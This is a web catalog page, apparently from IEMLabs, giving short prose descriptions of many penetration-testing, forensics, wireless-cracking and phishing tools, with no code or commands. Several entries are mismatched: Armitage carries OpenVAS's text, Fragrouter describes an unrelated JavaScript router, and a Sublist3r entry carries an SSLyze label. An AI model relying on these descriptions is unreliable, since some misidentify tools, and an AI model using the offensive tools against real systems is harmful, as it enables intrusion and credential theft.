Latest Cyber Security Tools

Wfuzz

Description

Wfuzz has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the FUZZ keyword by the value of a given payload.

A payload in Wfuzz is a source of data.

This simple concept allows any input to be injected in any field of an HTTP request, allowing to perform complex web security attacks in different web application components

Wfuzz Tool | IEMLabs

WebSploit

Description

WebSploit Is An Open Source Project For:

  • Social Engineering Works
  • Scan,Crawler & Analysis Web
  • Automatic Exploiter
  • Support Network Attacks
  • Autopwn – Used From Metasploit For Scan and Exploit Target Service
  • wmap – Scan,Crawler Target Used From Metasploit wmap plugin
  •  
WebSploit Tool | IEMLabs

WebScarab

Description

ebScarab is designed to be a tool for anyone who needs to expose the workings of an HTTP(S) based application, whether to allow the developer to debug otherwise difficult problems, or to allow a security specialist to identify vulnerabilities in the way that the application has been designed or implemented.

It aims to become a tool that may be used automatically or interactively

to test web applications for their security.

WebScarab Tool | IEMLabs

w3af

Description

w3af is a Web Application Attack and Audit Framework which aims to identify and exploit all web application vulnerabilities. This package provides a graphical user interface (GUI) for the framework. If you want a command-line application only, install w3af-console. The framework has been called the “metasploit for the web”, but it’s actually much more than that, because it also discovers the web application vulnerabilities using black-box scanning techniques!.

w3af Tool | IEMLabs

PadBuster

Description

PadBuster is a Perl script for automating Padding Oracle Attacks. PadBuster provides the capability to decrypt the arbitrary ciphertext, encrypt arbitrary plaintext, and perform automated response analysis to determine whether a request is vulnerable to padding oracle attacks.

PadBuster Tool | IEMLabs

JoomScan

Description

OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments. Implemented in Perl, this tool enables seamless and effortless scanning of Joomla installations, while leaving a minimal footprint with its lightweight and modular architecture. It not only detects known offensive vulnerabilities, but also is able to detect many misconfigurations and admin-level shortcomings that can be exploited by adversaries to compromise the system.

JoomScan Tool | IEMLabs

Jboss-autopwn

Description

 This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.

Features include:

  • Multiplatform support – tested on Windows, Linux and Mac targets
  • Support for bind and reverse bind shells
  • Meterpreter shells and VNC support for Windows targets
Jboss-autopwn Tool | IEMLabs

Grabber

Description

Grabber is a black box web application vulnerability scanner that looks for SQL Injection,

Blind SQL injection, XSS vulnerability and File include injection. 

 

The tool aims to be quite generic, and can work with any kind of web application

regardless of the server side programming language. The tool is designed to be 

a simple, efficient way to detect vulnerabilities in a small simple

Grabber Tool | IEMLabs

Gobuster

Description

Gobuster is a tool used to brute-force:

  • URIs (directories and files) in web sites.
  • DNS subdomains (with wildcard support).

Because I wanted:

  1. something that didn’t have a fat Java GUI (console FTW).
  2. to build something that just worked on the command line.
  3. something that did not do recursive brute force.
Gobuster Tool | IEMLabs

FunkLoad

Description

 

Description – FunkLoad is a functional and load web tester, written in Python, whose main use cases are:

  • Functional testing of web projects, and thus regression testing as well.
  • Performance testing: by loading the web application and monitoring your servers it helps you to pinpoint bottlenecks, giving a detailed report of performance measurement.
  • Load testing tool to expose bugs that do not surface in cursory testing, like volume testing or longevity testing.
FunkLoad Tool | IEMLabs

Fimap

Description

 fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of SQL injection. It’s currently under heavy development but it’s usable.

fimap Tool | IEMLabs

DirBuster

Description

DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these. However tools of this nature are often as only good as the directory and file list they come with.

DirBuster Tool | IEMLabs

DIRB

Description

DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.

DIRB comes with a set of preconfigured attack wordlists for easy usage but you can use your custom wordlists. Also DIRB sometimes can be used as a classic CGI scanner, but remember is a content scanner not a vulnerability scanner.

DIRB Tool | IEMLabs

Deblaze

Description

Through the use of the Flex programming model and the ActionScript language, Flash Remoting was born. Flash applications can make requests to a remote server to call server side functions, such as looking up accounts, retrieving additional data and graphics, and performing complex business operations. However, the ability to call remote methods also increases the attack surface exposed by these applications. This tool will allow you to perform method enumeration and interrogation against flash remoting end points.

Deblaze Tool | IEMLabs

DAVTest

Description

DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.

DAVTest supports:

DAVTest Tool | IEMLabs

BlindElephant

Description

The BlindElephant Web Application Fingerprinter attempts to discover the version

of a (known) web application by comparing static files at known locations against

precomputed hashes for versions of those files in all available releases. 

 

The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.

BlindElephant Tool | IEMLabs

Arachni

Description

Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by learning from the HTTP responses it receives during the audit process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify false-positives.

Arachni Tool | IEMLabs

Volatility Framework

Description

The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independent of the system being investigated but offer unprecedented visibility into the runtime state of the system.

Volatility Framework Tool | IEMLabs

RegRipper

Description

RegRipper is an open source tool, written in Perl, for extracting/parsing information (keys, values, data) from the Registry and presenting it for analysis.

RegRipper consists of two basic tools, both of which provide similar capability. The RegRipper GUI allows the analyst to select a hive to parse, an output file for the results, and a profile (list of plugins) to run against the hive. When the analyst launches the tool against the hive, the results go to the file that the analyst designated. If the analyst chooses to parse the System hive, they might also choose to send the results to system.txt.

RegRipper Tool | IEMLabs

Peepdf

Description

peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not. The aim of this tool is to provide all the necessary components that a security researcher could need in a PDF analysis without using 3 or 4 tools to make all the tasks. With peepdf it’s possible to see all the objects in the document showing the suspicious elements, supports the most used filters and encodings.

Peepdf Tool | IEMLabs

Guymager

Description

Guymager is a free forensic imager for media acquisition. Its main features are:

  • Easy user interface in different languages
  • Runs under Linux
  • Really fast, due to multi-threaded, pipelined design and multi-threaded data compression
Guymager Tool | IEMLabs

Foremost

Description

Foremost is a forensic program to recover lost files based on their headers, footers, and internal data structures. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you can use command line switches to specify built-in file types. These built-in types look at the data structures of a given file format allowing for a more reliable and faster recovery.

Foremost Tool | IEMLabs

Extundelete

Description

extundelete is a utility that can recover deleted files from an ext3 or ext4 partition. The ext3 and ext4 file systems are the most common default file systems in Linux distributions like Mint, Mageia, or Ubuntu. extundelete uses information stored in the partition’s journal to attempt to recover a file that has been deleted from the partition.

Extundelete Tool | IEMLabs

Dumpzilla

Description

Dumpzilla application is developed in Python 3.x and has as purpose extract all forensic interesting information of Firefox, Iceweasel and Seamonkey browsers to be analyzed. Due to its Python 3.x development, might not work properly in old Python versions, mainly with certain characters.

DumpzillaTool | IEMLabs

Distorm3

Description

diStorm is a lightweight, easy-to-use and fast decomposer library. diStorm disassembles instructions in 16, 32 and 64 bit modes. Supported instruction sets: FPU, MMX, SSE, SSE2, SSE3, SSSE3, SSE4, 3DNow! (w/ extensions), new x86-64 instruction sets, VMX, AMD’s SVM and AVX!. The output of the new interface of diStorm is a special structure that can describe any x86 instruction, this structure can be later formatted into text for display too.

Distorm3 Tool | IEMLabs

DFF

Description

 DFF (Digital Forensics Framework) is a free and Open Source computer forensics software built on top of a dedicated Application Programming Interface (API).

It can be used both by professional and non-expert people in order to quickly and easily collect, preserve and reveal digital evidence without compromising systems and data.

  • Preserve digital chain of custody: Software write blocker, cryptographic hash calculation
DFF Tool | IEMLabs

ddrescue

Description

Like dd, dd_rescue does copy data from one file or block device to another. You can specify file positions (called seek and Skip in dd). There are several differences:

  • dd_rescue does not provide character conversions.
  • The command syntax is different. Call dd_rescue -h.
ddrescue Tool | IEMLabs

Chntpw

Description

This little program will enable you to view some information and

change user passwords in a Windows NT SAM user database file.

You do not need to know the old passwords.

However, you need to get at the file some way or another yourself.

 

chntpw Tool | IEMLabs

Capstone

Description

Capstone is a disassembly framework with the target of becoming the ultimate disasm engine for binary analysis and reversing in the security community.

Created by Nguyen Anh Quynh, then developed and maintained by a small community, Capstone offers some unparalleled features:

capstone Tools | IEMLabs

Binwalk

Description

Binwalk is a tool for searching a given binary image for embedded files and executable code. Specifically, it is designed for identifying files and code embedded inside of firmware images. Binwalk uses the libmagic library, so it is compatible with magic signatures created for the Unix file utility. Binwalk also includes a custom magic signature file which contains improved signatures for files that are commonly found in firmware images such as compressed/archived files, firmware headers, Linux kernels, bootloaders, filesystems, etc.

Binwalk Tool | IEMLabs

Wifite

Description

To attack multiple WEP, WPA, and WPS encrypted networks in a row. This tool is customizable to be automated with only a few arguments. Wifite aims to be the “set it and forget it” wireless auditing tool.

Features:

  • sorts targets by signal strength (in dB); cracks closest access points first
wifite Tool | IEMLabs

Wifitap

Description

Wifitap is a proof of concept for communication over WiFi networks using traffic injection.

Wifitap allows any application do send and receive IP packets using 802.11 traffic capture and injection over a WiFi network simply configuring wj0, which means :

  • setting an IP address consistent with target network address range
  • routing desired traffic through it
Wifitap Tool | IEMLabs

Wifiphisher

Description

Wifiphisher is a security tool that mounts automated phishing attacks against Wi-Fi networks in order to obtain credentials or infect the victims with ‘malware’. It is a social engineering attack that can be used to obtain WPA/WPA2 secret passphrases and unlike other methods, it does not require any brute forcing.

After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.

 

Wifiphisher Tool | IEMLabs

Wifi Honey

Description

This script creates five monitor mode interfaces, four are used as APs and the fifth is used for airodump-ng. To make things easier, rather than having five windows all this is done in a screen session which allows you to switch between screens to see what is going on. All sessions are labelled so you know which is which.

wifi-honey Tool | IEMLabs

Spooftooph

Description

Spooftooph is designed to automate spoofing or cloning Bluetooth device information. Make a Bluetooth device hide in plain site.

Features:

  • Clone and log Bluetooth device information
  • Generate a random new Bluetooth profile
  • Change Bluetooth profile every X seconds
Spooftooph Tool | IEMLabs

rtlsdr-Scanner

Description

A cross platform Python frequency scanning GUI for USB TV dongles, using the OsmoSDR rtl-sdr library.

In other words a cheap, simple Spectrum Analyser.

The scanner attempts to overcome the tuner’s frequency response by averaging scans from both the positive and negative frequency offers of the baseband data.

RTLSDR Scanner Tool | IEMLabs

Redfang

Description

fang is a small proof-of-concept application to find non discoverable bluetooth devices. This is done by brute forcing the last six (6) bytes of the bluetooth address of the device and doing a read_remote_name(). This release of redfang now supports multiple threads and has now been modified for multiple devices and the code has been streamlined.

Features:

Redfang Tool | IEMLabs

PixieWPS

Description

Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some APs (pixie dust attack). It is meant for educational purposes only. All credits for the research go to Dominique Bongard.

Features:

PixieWPS Tool | IEMLabs

mfcuk

Description

Toolkit containing samples and various tools based on and around libnfc and crapto1, with emphasis on Mifare Classic NXP/Philips RFID cards.

mfcuk Tool | IEMLabs

Gr-scan

Description

gr-scan is a program written in C++, and built upon GNU Radio, rtl-sdr, and the OsmoSDR Source Block. It is intended to scan a range of frequencies and print a list of discovered signals. It should work with any device that works with that block, including Realtek RTL2832U devices. I developed this software using a Compro U620F, which uses an E4000 tuner.

Gr-scan Tool | IEMLabs

Gqrx

Description

Gqrx is a software defined radio receiver powered by the GNU Radio SDR framework and the Qt graphical toolkit. Gqrx supports many of the SDR hardware available, including Funcube Dongles, rtl-sdr, HackRF and USRP devices. See supported devices for a complete list. Gqrx is free and hacker friendly software.

Gqrx Tool | IEMLabs

GISKismet

Description

GISKismet is a wireless recon visualization tool to represent data gathered using Kismet in a flexible manner. GISKismet stores the information in a database so that the user can generate graphs using SQL. GISKismet currently uses SQLite for the database and GoogleEarth / KML files for graphing. GISKismet supports Kismet-newcore and Kismet-devel.

GISKismet Tool | IEMLabs

FreeRADIUS-WPE

Description

 The FreeRADIUS Server Project is a high performance and highly configurable multi-protocol policy server, supporting RADIUS, DHCPv4 and VMPS. It is available under the terms of the GNU GPLv2. Using RADIUS allows authentication and authorization for a network to be centralized, and minimizes the number of changes that have to be done when adding or deleting new users to a network.

FreeRADIUS Tool | IEMLabs

Fern Wifi Cracker

Description

Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks.

Fern Wifi Cracker currently supports the following features:

Fern Wifi Cracker Tool | IEMLabs

eapmd5pass

Description

EAP-MD5 is a legacy authentication mechanism that does not provide sufficient protection for user authentication credentials. Users who authenticate using EAP-MD5 subject themselves to an offline dictionary attack vulnerability. This tool reads from a live network interface in monitor-mode, or from a stored libpcap capture file, and extracts the portions of the EAP-MD5 authentication exchange.

eapmd5pass Tool | IEMLabs

coWPAtty

Description

Implementation of an offline dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g. WPA-Personal). Many enterprise networks deploy PSK-based authentication mechanisms for WPA/WPA2 since it is much easier than establishing the necessary RADIUS, supplicant and certificate authority architecture needed for WPA-Enterprise authentication.

coWPAtty Tool | IEMLabs

Bully

Description

Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc) regardless of architecture.

Bully Tool | IEMLabs

BlueRanger

Description

BlueRanger is a simple Bash script which uses Link Quality to locate Bluetooth device radios. It sends l2cap (Bluetooth) pings to create a connection between Bluetooth interfaces, since most devices allow pings without any authentication or authorization. The higher the link quality, the closer the device (in theory).

Use a Bluetooth Class 1 adapter for long range location detection. Switch to a Class 3 adapter for more precise short range locating.

BlueRanger Tool | IEMLabs

Bluepot

Description

Bluepot is a Bluetooth Honeypot written in Java, it runs on Linux.

Bluepot was a third year university project attempting to implement a fully functional Bluetooth Honeypot. A piece of software designed to accept and store any malware sent to it and interact with common Bluetooth attacks such as “BlueBugging?” and “BlueSnarfing?”. Bluetooth connectivity is provided via hardware Bluetooth dongles.

Bluepot Tool | IEMLabs

Bluemaho

Description

BlueMaho is GUI-shell (interface) for suite of tools for testing security of bluetooth devices. It is freeware, opensource, written on python, uses wxPyhon. It can be used for testing BT-devices for known vulnerabilities and major thing to do – testing to find unknown vulns. Also it can form nice statistics.

Features:

Bluemaho Tool | IEMLabs

Bluelog

Description

Bluelog is a Linux Bluetooth scanner with optional daemon mode and web front-end, designed for site surveys and traffic monitoring. It’s intended to be run for long periods of time in a static location to determine how many discoverable Bluetooth devices there are in the area.

Bluelog Tool | IEMLabs

Linux Exploit Suggester

Description

As the name suggests, this is a Linux Exploit Suggester, with no frills and no fancy features; just a simple script to keep track of vulnerabilities and suggest possible exploits to use to gain ‘root‘ on a legitimate penetration test, or governing examining body. LES tool is designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machines.

Linux Exploit Suggester Tool | IEMLabs

Jboss-autopwn

Description

This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to

provide an interactive session.

 

Features include:

Jboss-autopwn Tool | IEMLabs

Exploitdb

Description

The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits, shellcode and papers gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database.

Exploitdb Tool | IEMLabs

Crackle

Description

crackle cracks BLE Encryption (AKA Bluetooth Smart).

crackle exploits a flaw in the BLE pairing process that allows an attacker to guess or very quickly brute force the TK (Temporary Key). With the TK and other data collected from the pairing process, the STK (Short Term Key) and later the LTK (Long Term Key) can be collected.

Crackle Tool | IEMLabs

Commix

Description

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks

Commix Tool | IEMLabs

Backdoor Factory

Description

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

Supporting: Windows PE x32/x64 and Linux ELF x32/x64 (System V)

Backdoor Factory Tool | IEMLabs

Armitage

Description

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. The framework is part of Greenbone Networks’ commercial vulnerability management solution from which developments have contributed to the Open Source community since 2009.

Armitage Tool | IEMLabs

Yersinia

Description

Yersinia is a framework for performing layer 2 attacks. It is designed to take advantage of some weaknesses in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.

Yersinia Tool | IEMLabs

Unix-privesc-check

Description

Shell script to check for simple privilege escalation vectors on Unix systems.

Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HP UX 11, Various Linuxes, FreeBSD 6.2).

Unix-privesc-check Tool | IEMLabs

THC-IPV6

Description

The THC IPV6 ATTACK TOOLKIT comes already with lots of effective attacking

tools:

 – parasite6: ICMPv6 neighbor solicitation/advertisement spoofer, puts you as man-in-the-middle, same as ARP mitm (and parasite)

 – alive6: an effective alive scanning, which will detect all systems listening to this address

THC-IPV6 Tool | IEMLabs

Openvas

Description

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. The framework is part of Greenbone Networks’ commercial vulnerability management solution from which developments have contributed to the Open Source community since 2009.

Openvas Tool | IEMLabs

Ohrwurm

Description

ohrwurm is a small and simple RTP fuzzer that has been successfully tested on a small number of SIP phones. Features:

  • reads SIP messages to get information of the RTP port numbers
  • reading SIP can be omitted by providing the RTP port numbers, so that any RTP traffic can be fuzzed
Ohrwurm Tool | IEMLabs

jSQL Injection

Description

 jSQL Injection is a lightweight application used to find database information from a distant server.

It is free, open source and it works cross-platform on Windows, Linux and Mac OS X with Java from version 8 to 15. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux.

jSQL Injection Tool | IEMLabs

Hexorbase

Description

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and brute force attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).

Hexorbase Tool | IEMLabs

Doona

Description

Doona is a fork of the Bruteforce Exploit Detector Tool (BED). BED is a program which is designed to check daemons for potential buffer overflows, format string bugs etc. Doona is Australian for duvet. It adds a significant enough number  of features/changes to BED.

Doona Tool | IEMLabs

Cisco Global Exploiter

Description

Cisco Global Exploiter (CGE), is an advanced, simple and fast security testing tool, that is able to exploit the most dangerous vulnerabilities of Cisco systems. CGE has an intuitive and simple user interface and it is executable from commands line, by inputting two simple parameters, like the target and the vulnerability to exploit.

Cisco-global-exploiter Tool | IEMLabs

Xplico

Description

Xplico is a Network Forensic Analysis Tool NFAT, for Unix and Unix-like operating systems. It uses libpcap, a packet capture and filtering library.
Xplico in console-mode permits you to decode a single pcap file, directory of pcap files or decode in realtime from an ethernet interface (eth0, eth1, …).

Xplico Tool | IEMLabs

WOL-E

Description

WOL-E is a suite of tools for the Wake on LAN feature of network attached computers, this is now enabled by default on many Apple computers.

These tools include:
Bruteforcing the MAC address to wake up clients.

WOL-E Tool | IEMLabs

Wireshark

Description

Wireshark is a network traffic analyzer, or “sniffer”, for Linux, macOS, *BSD and other Unix and Unix-like operating systems and for Windows. It uses Qt, a graphical user interface library, and libpcap and npcap as packet capture and filtering libraries.

Wireshark Tool | IEMLabs

URLCrazy

Description

URLCrazy is an OSINT tool to generate and test domain typos or variations to detect or perform typosquatting, URL hijacking, phishing, and corporate espionage.

URLCrazy Tool | IEMLabs

Unicornscan

Description

Unicornscan is a new information gathering and correlation engine built for and by members of the security research and testing communities. It was designed to provide an engine that is Scalable, Accurate, Flexible, and Efficient. It is released for the community to use under the terms of the GPL license.

Unicornscan Tool | IEMLabs

theHarvester

Description

The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.

This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.

Harvester Tool | IEMLabs

Sublist3r

Description

Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS.

subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.

SSLyze Tool | IEMLabs

Twofi

Description

When attempting to crack passwords custom word lists are very useful additions to standard dictionaries.

An interesting idea originally released on the “7 Habits of Highly Effective Hackers” blog was to use Twitter to help generate those lists based on searches for keywords related to the list that is being cracked.

Twofi Tool | IEMLabs

SSLyze

Description

SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify mis-configurations affecting their SSL servers.

SSLyze Tool | IEMLabs

SSLstrip

Description

sslstrip is a tool that transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, and then maps those links into look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

SSLstrip Tool | IEMLabs

SSLsplit

Description

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.

SSLsplit Tool | IEMLabs

SSLcaudit

Description

The goal of sslcaudit project is to develop a utility to automate testing SSL/TLS clients for resistance against MITM attacks. It might be useful for testing a thick client, a mobile application, an appliance, pretty much anything communicating over SSL/TLS over TCP.

SSLcaudit Tool | IEMLabs

SPARTA

Description

SPARTA is a python GUI application that simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having point-and-click access to their toolkit and by displaying all tool output in a convenient way. If less time is spent setting up commands and tools, more time can be spent focusing on analysing results.

Sparta Tool | IEMLabs

Snmp-check

Description

Like snmpwalk, snmp-check allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring. Distributed under GPL license and based on “Athena-2k” script by jshaw.

Snmp-check Tool | IEMLabs

Smtp-user-enum

Description

Smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN and RCPT TO commands. It could be adapted to work against other vulnerable SMTP daemons, but this hasn’t been done as of v1.0.

Smtp-user-enum Tool | IEMLabs

SMBMap

Description

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.

SMBMap Tool | IEMLabs

Social Engineer Toolkit(SET)

Description

The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio.

SET Tool | IEMLabs

Recon-ng Framework

Description

Recon-ng is a full-featured reconnaissance framework designed with the goal of providing a powerful environment to conduct open source web-based reconnaissance quickly and thoroughly.

Recon-ng Tool | IEMLabs

Parsero

Description

Parsero is a free script written in Python which reads the Robots.txt file of a web server and looks at the Disallow entries. The Disallow entries tell the search engines what directories or files hosted on a web server mustn’t be indexed. For example, “Disallow: /portal/login” means that the content on www.example.com/portal/login it’s not allowed to be indexed by crawlers like Google, Bing, Yahoo… This is the way the administrator have to not share sensitive or private information with the search engines.

Parsero Tool | IEMLabs

OSRFramework

Description

OSRFramework is a GNU AGPLv3+ set of libraries developed by i3visio to perform Open Source Intelligence collection tasks. They include references to a bunch of different applications related to username checking, DNS lookups, information leaks research, deep web search, regular expressions extraction and many others. At the same time, by means of ad-hoc Maltego transforms, OSRFramework provides a way of making these queries graphically as well as several interfaces to interact with like OSRFConsole or a Web interface.

OSRFramework Tool | IEMLabs

ntopng

Description

Ntopng is a web-based network traffic monitoring application released under GPLv3. It is the new incarnation of the original ntop written in 1998, and now revamped in terms of performance, usability, and features.

Ntopng Tool | IEMLabs

Metagoofil

Description

Metagoofil is a tool for extracting metadata of public documents (pdf,doc,xls,ppt,etc) availables in the target websites.This information could be useful because you can get valid usernames, people names, for using later in brute force password attacks (vpn, ftp, webapps), the tool will also extracts interesting “paths” of the documents, where we can get shared resources names, server names, etc.

Metagoofil Tool | IEMLabs

Masscan

Description

This is an Internet-scale port scanner. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second, from a single machine.

It’s input/output is similar to nmap, the most famous port scanner. When in doubt, try one of those features.

Masscan Tool | IEMLabs

Intrace

Description

InTrace is a traceroute-like application that enables users to enumerate IP hops using existing TCP connections, both initiated from local network (local system) or from remote hosts. It could be useful for network reconnaissance and firewall bypassing.

InTrace Tool | IEMLabs

Ident-user-enum

Description

Ident-user-enum is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system.

Ident-user-enum Tool | IEMLabs

hping3

Description

Hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation, and almost arbitrary packet size and content, using the command line interface.

Hping3 Tool | IEMLabs

GoLismero

Description

GoLismero is an open source framework for security testing. It’s currently geared towards web security, but it can easily be expanded to other kinds of scans.


GoLismero Tool | IEMLabs

Ghost Phisher

Description

Ghost Phisher is a Wireless and Ethernet security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to emulate access points and deploy various internal networking servers for networking, penetration testing and phishing attacks.

Ghost Phisher Tool | IEMLabs

Fragrouter

Description

FragRouter is a hash-based routing for web browsers, similar to normal URL routing found in server-side MVC frameworks like Django or Ruby on Rails (and most others). It is ‘hash-based’ because it uses the fragment identifier (commonly called ‘hash’) to determine the path. FragRouter can be used either as stand-alone script using the conventional <script> tag, or as an AMD module with loaders like RequireJS.

Fragrouter Tool | IEMLabs

Firewalk

Description

A simple backdoor with the goal of circumventing network firewalls. The daemon process, fwalk.c, runs on the system that you’re wanting to backdoor. It processes all incoming ICMP packets, looking for a password, ip address and port number in the payload. If the password matches, it establishes a TCP connection with the IP address and port number specified and launches a root shell.

Firewalk Tool | IEMLabs

Fierce

Description

Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains. It’s really meant as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all of those require that you already know what IP space you are looking for. This does not perform exploitation and does not scan the whole internet indiscriminately.

Fierce Tool | IEMLabs

Faraday

Description

Faraday introduces a new concept – IPE (Integrated Penetration-Test Environment) a multiuser Penetration test IDE. Designed for distributing, indexing, and analyzing the data generated during a security audit. Faraday was made to let you take advantage of the available tools in the community in a truly multiuser way.

Faraday Tool | IEMLabs

EyeWitness

Description

EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if known.

EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line, nmap xml output, or nessus xml output.

EyeWitness Tool | IEMLabs

EnumIAX

Description

EnumIAX is an Inter Asterisk Exchange protocol username brute-force

enumerator.

EnumIAX may operate in two distinct modes; Sequential Username Guessing or

Dictionary Attack.

EnumIAX Tool | IEMLabs

Enum4linux

Description

Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.

It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup.

Enum4linux Tool | IEMLabs

DotDotPwn

Description

 DotDotPwn is a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc.

Also, it has a protocol-independent module to send the desired payload to the host and port specified. On the other hand, it also could be used in a scripting way using the STDOUT module.

DotDotPwn Tool | IEMLabs

DNSWalk

Description

Dnswalk is a DNS debugger.  It performs zone transfers of specified domains, and checks the database in numerous ways for internal consistency, as well as accuracy.

DnsWalk Tool | IEMLabs

DNSTracer

Description

Dnstracer determines where a given Domain Name Server (DNS) gets its information from, and follows the chain of DNS servers back to the servers which know the data. Its behaviour is similar to ntptrace(8), which does it for the NTP protocol.

DNSTracer Tool | IEMLabs

Dnsmap